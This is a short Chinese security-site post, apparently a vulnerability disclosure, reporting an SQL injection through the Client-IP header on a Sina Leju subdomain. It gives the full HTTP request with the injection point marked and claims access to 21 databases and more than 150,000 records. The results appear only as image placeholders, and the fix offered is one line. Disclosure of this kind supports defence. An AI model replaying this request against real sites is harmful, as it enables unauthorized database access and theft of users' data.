频道栏目
首页 > 安全 > 网站安全 > 正文
新浪乐居某站ClientIP存在SQL注入(21库)
2016-04-26 09:00:19           
收藏   我要投稿

新浪乐居https://tj.newsesf.leju.com/网站存在注入。

GET数据如下:注入参数Client-IP
 

GET /news/hd/sina_daogou/daogou20160111kl/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: 1*
X-Requested-With: XMLHttpRequest
Referer: https://tj.newsesf.leju.com/
Cookie: PHPSESSID=l0octpp9o4p0nb82e1br3hepj7
Host: tj.newsesf.leju.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


测试结果:
 

1.png


21库:
 

2.png


current-db:
 

3.png


15万+数据
 

4.png

解决方案:

过滤字符吧。

点击复制链接 与好友分享!回本站首页
相关TAG标签 乐居 新浪
上一篇:用Wordpress搭建个人网站(2)
下一篇:ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私
相关文章
图文推荐
文章
推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站